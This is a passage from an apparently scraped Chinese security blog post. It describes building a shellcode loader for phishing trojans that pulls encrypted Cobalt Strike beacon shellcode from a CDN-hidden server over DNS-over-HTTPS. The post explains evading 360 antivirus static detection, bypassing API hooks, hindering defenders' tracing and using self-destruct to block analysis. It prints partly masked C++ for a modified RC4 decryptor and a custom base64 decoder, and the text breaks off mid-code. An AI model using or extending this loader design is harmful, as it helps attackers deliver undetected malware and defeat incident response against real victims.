2em;"><br/></section><section style="text-align: center;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="0.7472222222222222" data-s="300,640" style="" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=b35fde7d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIps0FIOvqBwDiclB8CiaqQsC9j1gzW3YFibSzOTTkqIqktkCvKxL49ZL8s82KV7TXwnzjUibA13HWy2w%2F640%3Fwx_fmt%3Djpeg"/></section><section style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;font-size: 13px;color: rgb(0, 0, 0);letter-spacing: normal;text-wrap: wrap;margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><span style="font-size: 16px;font-family: &#34;PingFang SC&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-stretch: normal;"><br/></span></section><section style="margin-bottom: 8px;margin-top: 8px;line-height: 2em;"><br/></section><section style="margin-top: 8px;line-height: 2em;"><section style="display: none;margin-bottom: 8px;"><br/></section></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484045">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9eb901f2&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247484045%26idx%3D1%26sn%3Dd808757bec1376d8e8bf94e562d9ac22%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 25 Jul 2023 23:25:00 +0800</pubDate>
    </item>
    <item>
      <title>基于DoH的无特征shellcode加载器实现</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247484040&amp;idx=1&amp;sn=424879af2c898b1de8d899b7ab4d5f11</link>
      <description>单文件分离免杀的另一个实现方式，提升静态查杀的对抗效果。相比传统文件分离马可实现单文件落地，且没有文件操作相关API的调用，消除可疑特征。针对仅有的可疑特征——内存分配相关的API调用，可使用动态加载+syscall的形式轻松隐藏</description>
      <content:encoded><![CDATA[<p>
原创 <span>hunter</span> <span>2023-07-24 23:52</span> <span style="display: inline-block;">北京</span>
</p>

<p>单文件分离免杀的另一个实现方式，提升静态查杀的对抗效果。相比传统文件分离马可实现单文件落地，且没有文件操作相关API的调用，消除可疑特征。针对仅有的可疑特征——内存分配相关的API调用，可使用动态加载+syscall的形式轻松隐藏</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=544bda0f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzefmbOPNWjjIgZxKzNMQXrL4iav6AcesgAWaibae8NdKtibPFDCYdZ3qeZA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<h2 style="line-height: 2em;margin-bottom: 8px;"><span style="font-family: 宋体;color: rgb(0, 0, 0);">author:</span><strong><span style="font-family: 宋体;color: rgb(255, 0, 0);">hunter@深蓝攻防实验室</span></strong></h2><table><tbody><tr><td width="557" valign="top" style="word-break: break-all;"><p>基于DoH的无特征shellcode加载器实现</p><p>1. 场景</p><p>1.1 目前面临的困难</p><p>1.2 解决了什么问题</p><p>2. 方案/实现</p><p>2.1 服务端</p><p>2.2 客户端</p><p>2.3 连通性保障</p><p>2.4 服务端证书校验</p><p>3. 测试</p><p>3.1 免杀测试</p><p>3.2 上线测试/流量分析</p><p>3.3 证书替换测试</p><p>4. 简易版loader</p><p>5. 总结</p></td></tr></tbody></table><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:xiVHQ;"><span style="font-family:宋体;"></span></span></h2><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p><span style="mso-bookmark:xiVHQ;"><span style="font-family:宋体;"></span></span></p><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;">1. 场景</span></strong></span>
  </h2><h3 style="line-height: 2em;margin-bottom: 8px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: 宋体;">1.1 目前面临的困难</span>
  </strong></span></h3><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:NgodD;"></span><span style="mso-bookmark:u68be10ea;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">在红队项目密集或同时进攻多个目标的场景下，钓鱼马批量发出去后很容易有样本被360上传，那么同一批马就会迅速在其他项目中就无法使用，被落地杀。目前360最烦人的两点就是基于QVM云引擎的静态查杀和本地行为监控，行为监控可以通过白驱动暂时瘫痪360主动防御来实现权限维持等高危操作，但这一切依然需要满足一个前提：需要现有一个shell，即马不能被静态查杀。有的马做分离免杀效果还不错。但目前只有分离成多个文件的效果还可以，而实现单文件则需要在资源段或其他段内嵌数据，解密后再释放文件到磁盘/内存，这种操作和特征对于360来说是极为敏感的。</span></span></p><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:u68be10ea;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">19年的时候做过一些远程加载shellcode的尝试，但那时候一没有购买CDN、二没有支持DoH的DNS服务器，增加一次额外的payload下载过程反而给了（当时能力还不是很强的）防守方更好的溯源机会，所以没有在实战中应用过这类木马。</span></span><span style="mso-bookmark:u68be10ea;"><span style="font-family:Calibri;"></span></span></p><h3 style="line-height: 2em;margin-bottom: 8px;"><span style="font-size: 20px;"><strong><span style="font-size: 20px;font-family: 宋体;">1.2 解决了什么问题</span>
  </strong></span></h3><section style="font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;margin-left: 18pt;line-height: 2em;margin-bottom: 8px;text-indent: 0em;"><span style="font-family:Calibri;">1.<span style="font:7.0pt Times New Roman;"></span></span><span style="mso-bookmark:bHxB2;"></span><span style="mso-bookmark:ub4c01fd8;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">单文件分离免杀的另一个实现方式，提升静态查杀的对抗效果。</span></span><span style="mso-bookmark:ub4c01fd8;"><span style="font-size:12.0pt;line-height:150%;font-family:宋体;">相比传统文件分离马可实现单文件落地，且没有文件操作相关API的调用，消除可疑特征。针对仅有的可疑特征——内存分配相关的API调用，可使用动态加载+syscall的形式轻松隐藏。</span></span><span style="mso-bookmark:ub4c01fd8;"><span style="font-family:Calibri;"></span></span></section><section style="font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;margin-left: 18pt;line-height: 2em;margin-bottom: 8px;text-indent: 0em;"><span style="font-family:Calibri;">2.<span style="font:7.0pt Times New Roman;"></span></span><span style="mso-bookmark:ub4c01fd8;"></span><span style="mso-bookmark:u639809da;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">木马本身不内置shellcode，静态特征不明显；且可以通过控制远程提供shellcode的服务端开启/关闭/更换路径来阻断木马上线。不会上线的木马本身也没有任何危险行为，不容易被分析。</span></span><span style="mso-bookmark:u639809da;"><span style="font-family:Calibri;"></span></span></section><section style="font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;margin-left: 18pt;line-height: 2em;margin-bottom: 8px;text-indent: 0em;"><span style="font-family:Calibri;">3.<span style="font:7.0pt Times New Roman;"></span></span><span style="mso-bookmark:u639809da;"><span style="font-size:12.0pt;line-height:150%;font-family:宋体;">所有网络通信均采用自封装模块实现。底层调用标准C接口，不经过Win API，规避启发式引擎扫描及Hook。</span></span><span style="mso-bookmark:u639809da;"><span style="font-family:Calibri;"></span></span></section><section style="font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;margin-left: 18pt;line-height: 2em;margin-bottom: 8px;text-indent: 0em;"><span style="font-family:Calibri;">4.<span style="font:7.0pt Times New Roman;"></span></span><span style="mso-bookmark:u639809da;"><span style="font-size:12.0pt;line-height:150%;font-family:宋体;">内置根证书链。支持实时校验证书的有效性，可在有需求的情况下开启，有效防御流量劫持。</span></span><span style="mso-bookmark:u639809da;"><span style="font-family:Calibri;"></span></span></section><section style="font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;margin-left: 18pt;line-height: 2em;margin-bottom: 8px;text-indent: 0em;"><span style="font-family:Calibri;">5.<span style="font:7.0pt Times New Roman;"></span></span><span style="mso-bookmark:u639809da;"></span><span style="mso-bookmark:u399064e1;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">开发过程沿用了之前的模块化思想，将所有自己编写/二次封装的模块编译为静态库，这样在项目过程中也可以抽时间快速开发新的木马，选择不同的模块以实现不同的功能。</span></span><span style="mso-bookmark:u399064e1;"><span style="font-family:Calibri;"></span></span></section><section style="font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;margin-left: 18pt;line-height: 2em;margin-bottom: 8px;text-indent: 0em;"><span style="font-family:Calibri;">6.<span style="font:7.0pt Times New Roman;"></span></span><span style="mso-bookmark:u399064e1;"></span><span style="mso-bookmark:u1eabae0e;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">保护二开的beacon。将自研beacon的本体shellcode加密保存在云端，如果防守方应急或比赛结束后可以方便快速地关闭下载路径，配合木马的自毁，可大大减小自研beacon留在本地被厂商抓走分析的可能性。</span></span><span style="mso-bookmark:u1eabae0e;"><span style="font-family:Calibri;"></span></span></section><section style="font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;margin-left: 18pt;line-height: 2em;margin-bottom: 8px;text-indent: 0em;"><span style="font-family:Calibri;">7.<span style="font:7.0pt Times New Roman;"></span></span><span style="mso-bookmark:u1eabae0e;"></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">由于编译生成的木马自身携带libssl和libcurl等第三方库函数，</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:12.0pt;line-height:150%;font-family:宋体;">底层</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:12.0pt;line-height:150%;font-family:宋体;">同样</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:12.0pt;line-height:150%;font-family:宋体;">调用标准C</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:12.0pt;line-height:150%;font-family:宋体;">。</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">所以</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">理论上</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">在Windows XP等不支持https的系统上也可以正常进行https加密通信（但开发环境需要降低SDK版本做适配，暂时还没有做）。</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">因此</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">还可以基于这套二次封装的函数</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">库</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">结合自研beacon实现XP/03上的全加密通信，进一步规避流量审计。</span></span><span style="mso-bookmark:ucf4e4c4d;"><span style="font-family:Calibri;"></span></span></section><p style="font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;margin-left: 18pt;text-indent: -18pt;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:ucf4e4c4d;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;"><br/></span></span></p><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:ucf4e4c4d;"></span></h2><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:cVKNn;"><span style="font-family:宋体;"><br/></span></span></h2><h2 style="line-height: 2em;margin-bottom: 8px;"><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-family: 宋体;">2. 方案/实现
  </span></strong></span></h2><h3 style="line-height: 2em;margin-bottom: 8px;"><strong><span style="font-size: 20px;"><span style="font-size: 20px;font-family: 宋体;">2.1 服务端</span>
  </span></strong></h3><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:tzWOI;"></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">要实现远程加载，首先需要部署一个在互联网上的服务器，并且</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">这个服务器</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">要藏在CDN后面防止被溯源到固定IP直接封锁。原本想自己写一个Web平台然后新开一个CDN域名专门用来挂shellcode，但CS的TeamServer本身就支持https服务器托管文件，且路径是可以自定义的。因此直接用CS的TeamServer复用之前的CDN就可以了，省去不必要的造轮子。</span></span><span style="mso-bookmark:ua16903aa;"><span style="mso-bookmark:oU8Co;"><span style="font-family:宋体;">              <shape type="#_x0000_t75" filled="f" style="text-indent:0;left:0;width:369.6pt;height:313.2pt;"><imagedata title="image1"></imagedata></shape><img class="rich_pages wxw-img" data-backh="418" data-backw="493" data-ratio="0.847870182555781" style="width: 100%;height: auto;" data-type="png" data-w="493" src="https://wechat2rss.xlab.app/img-proxy/?k=1e5e7512&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzezSvu9Hfn5YOwoZzyCAgyRyY83UQk6DkUicBr6HatzTxULtKNjVWbwvg%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:oU8Co;"></span><span style="mso-bookmark:ua16903aa;"><span style="mso-bookmark:U6ieP;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-backh="52" data-backw="578" data-ratio="0.08972267536704731" style="width: 100%;height: auto;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=fa51cb0a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeALGlibEopckG8vGDENPeosu8GAXaupm5lQo1nhCCpvY7H73xBLxBWzQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:U6ieP;"></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">由于TeamServer使用了CDN，因此直接访问TeamServer的IP或CDN的域名是可以看到加密托管的shellcode的，但访问CDN的IP则看不到</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">（</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">也就是木马实际通信的IP</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">）</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">。</span></span><span style="mso-bookmark:ua16903aa;"><span style="mso-bookmark:ttq5m;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-backh="324" data-backw="578" data-ratio="0.5598006644518272" style="width: 100%;height: auto;" data-type="png" data-w="602" src="https://wechat2rss.xlab.app/img-proxy/?k=4ee4b847&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeibxicDsBlBQmTeibLvPABRsuRuEu6ianoVq4W6LNH7pRvqmicwz9oxTsIdA%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:ttq5m;"></span><span style="mso-bookmark:ua16903aa;"><span style="mso-bookmark:gFCg0;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.46492659053833607" style="width:601.8091430664062px;height:284.5400085449219px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=07af55ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDze02pGRcxuQfAwA72mhJryJxc5WQeEtbyicfhpo6oMTpYgoAlzicvx3Ngg%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:gFCg0;"></span><span style="mso-bookmark:ua16903aa;"><span style="mso-bookmark:wBQTI;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.4274061990212072" style="width:601.8091430664062px;height:261.79998779296875px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=d6bd97c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzem0R9gtZabrS6CNQD1jL6uyR2tFu2lQSKkUM4MWkDuepqD6HehuOGTw%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:wBQTI;"></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">由于这个域名是加密内置在木马中的，要提取需要花费一定精力和技术实力来分析。且即使知道了域名，防守方依然无法劫持基于DoH的域名请求。新</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">版本</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">操作系统的手机</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">/</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">电脑都可能会有DoH请求域名服务器的行为，也不便于一封了之......所以对于防守方来说，溯源的成本高且收益小。</span></span><span style="mso-bookmark:ua16903aa;"><span style="font-family:Calibri;"></span></span></p><h3 style="line-height: 2em;margin-bottom: 8px;"><strong><span style="font-size: 20px;"><span style="font-size: 20px;font-family: 宋体;">2.2 客户端</span>
  </span></strong></h3><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:pq0Xo;"></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">上面的测试也看到了，托管的beacon shellcode是加密的，因此需要在客户端内置对应的加密算法用来解密。</span></span></p><p style="margin-left: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;text-indent: 0pt;line-height: 2em;margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">（P.<span style="font:7.0pt Times New Roman;"></span></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">S.之前想过使用非对称加密，但实际上如果真的被抓到进行分析，任何加密手段其实都是差不多的，公钥被拿走了还是一样还原beacon shellcode的二进制）</span></span></p><p style="margin-left: 0pt;text-indent: 0pt;font-size: 11pt;font-family: Calibri;font-weight: normal;margin-top: 11pt;text-align: left;line-height: 2em;margin-bottom: 8px;"><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">我这里使用的</span></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">对称加密</span></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">是模仿RC4写</span></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">的</span></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">一个类似的算法（但不是RC4），然后将被加密后的二进制做hex编码，最后进行base64编码（这个base64编码也是魔改过的）。木马中的解密过程则是逆过来，如下图。</span></span><span style="mso-bookmark:uaf89dfda;"><span style="mso-bookmark:sMF1x;"><span style="font-family:宋体;"><img class="rich_pages wxw-img" data-ratio="0.06525285481239804" style="width:601.8091430664062px;height:40.470001220703125px;" data-type="png" data-w="613" src="https://wechat2rss.xlab.app/img-proxy/?k=e16b14a8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtKwUxddJA4ewibzn0sIqlDzeBEytkg3wwe5ibqty2XpHXYialglegVVyTrun6FRyF1f38KkDGW6oicQibQ%2F640%3Fwx_fmt%3Dpng"/></span></span></span><span style="mso-bookmark:sMF1x;"></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">魔改算法是为了防止有经验的逆向工程师或者使用GPT这种AI插件一眼就看出来用了什么公开的算法，找到密钥后直接用现成的工具解密......这样分析的时间成本就大大降低了，有悖于我们“拖延时间”的宗旨。下面贴一下魔改版的算法实现</span></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">（</span></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">部分代码隐藏</span></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">）</span></span><span style="mso-bookmark:uaf89dfda;"><span style="font-size:11.0pt;font-family:宋体;color:#000000;font-weight:normal;font-style:normal;">。</span></span><span style="mso-bookmark:uaf89dfda;"><span style="font-family:Calibri;"></span></span></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cs"><code><span class="code-snippet_outer"><span class="code-snippet__comment">// 魔改RC4</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">string</span> <span class="code-snippet__title">rc4_encrypt_decrypt</span>(<span class="code-snippet__params"><span class="code-snippet__keyword">const</span> <span class="code-snippet__keyword">string</span>&amp; data, <span class="code-snippet__keyword">const</span> <span class="code-snippet__keyword">string</span>&amp; key</span>)</span> {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">string</span> result;</span></code><code><span class="code-snippet_outer">    result.reserve(data.size());</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    vector&lt;unsigned <span class="code-snippet__keyword">char</span>&gt; state(***);</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">0</span>; i &lt; ***; ++i) {</span></code><code><span class="code-snippet_outer">        state[i] = i;</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> j = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> keyLength = key.size();</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">0</span>; i &lt; ***; ++i) {</span></code><code><span class="code-snippet_outer">        j = (j + state[i] + key[i % keyLength]) % ***;</span></code><code><span class="code-snippet_outer">        swap(state[i], state[j]);</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    j = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">for</span> (<span class="code-snippet__keyword">char</span> c : data) {</span></code><code><span class="code-snippet_outer">        i = (i + <span class="code-snippet__number">1</span>) % ***;</span></code><code><span class="code-snippet_outer">        j = (j + state[i]) % ***;</span></code><code><span class="code-snippet_outer">        swap(state[i], state[j]);</span></code><code><span class="code-snippet_outer">        result += c ^ state[(state[i] + state[j]) % ***];</span></code><code><span class="code-snippet_outer">    }</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> result;</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__comment">// 魔改base64解码器</span></span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">static</span> inline <span class="code-snippet__keyword">bool</span> <span class="code-snippet__title">is_base64</span>(<span class="code-snippet__params">unsigned <span class="code-snippet__keyword">char</span> c</span>)</span> {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">return</span> (isalnum(c) || (c == <span class="code-snippet__string">&#39;***&#39;</span>) || (c == <span class="code-snippet__string">&#39;***&#39;</span>));</span></code><code><span class="code-snippet_outer">}</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__function"><span class="code-snippet__keyword">string</span> <span class="code-snippet__title">base64_decode</span>(<span class="code-snippet__params"><span class="code-snippet__keyword">const</span> <span class="code-snippet__keyword">string</span>&amp; encoded_string</span>)</span> {</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">const</span> <span class="code-snippet__keyword">string</span> base64_chars = <span class="code-snippet__string">&#34;***************************************************&#34;</span>;<span class="code-snippet__comment">//自己可以改</span></span></code><code><span class="code-snippet_outer">    size_t in_len = encoded_string.size();</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> i = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> j = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">int</span> in_ = <span class="code-snippet__number">0</span>;</span></code><code><span class="code-snippet_outer">    unsigned <span class="code-snippet__keyword">char</span> char_array_4[<span class="code-snippet__number">4</span>], char_array_3[<span class="code-snippet__number">3</span>];</span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">string</span> ret;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">    <span class="code-snippet__keyword">while</span> (in_len-- &amp;&amp; (encoded_string[in_] != <span class="code-snippet__string">&#39;=&#39;</span>) &amp;&amp; is_base64(encoded_string[in_])) {</span></code><code><span class="code-snippet_outer">        char_array_4[i++] = encoded_string[in_]; in_++;</span></code><code><span class="code-snippet_outer">        <span class="code-snippet__keyword">if</span> (i == <span class="code-snippet__number">4</span>) {</span></code><code><span class="code-snippet_outer">            <span class="code-snippet__keyword">for</span> (i = <span class="code-snippet__number">0</span>; i &lt; <span class="code-snippet__number">4</span>; i++)</span></code><code><span class="code-snippet_outer">                char_array_4[i] = base64_chars.find(char_array_4[i]) &amp; <span class="code-snippet__number">0xff</span>;</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span 